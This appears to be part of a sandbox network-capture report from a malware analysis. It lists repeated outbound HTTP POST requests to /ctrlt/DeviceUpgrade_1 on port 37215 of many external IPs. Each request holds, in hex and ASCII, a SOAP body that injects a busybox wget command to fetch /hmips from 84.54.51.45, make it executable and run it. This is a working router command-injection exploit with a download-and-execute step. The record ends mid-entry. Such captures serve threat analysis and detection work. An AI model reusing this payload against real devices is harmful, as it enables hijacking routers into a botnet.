                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            997192.168.2.154584841.220.119.14137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911524057 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            998192.168.2.154290841.6.255.17737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911524057 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            999192.168.2.154412041.72.76.19237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911550999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1000192.168.2.155350241.61.12.24337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911557913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1001192.168.2.153297441.5.59.18637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911557913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1002192.168.2.155070841.135.221.20437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911578894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1003192.168.2.155876441.123.117.19037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911581993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1004192.168.2.153281241.142.44.7637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911612034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1005192.168.2.155502041.250.176.3937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911626101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1006192.168.2.154865241.246.166.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911626101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 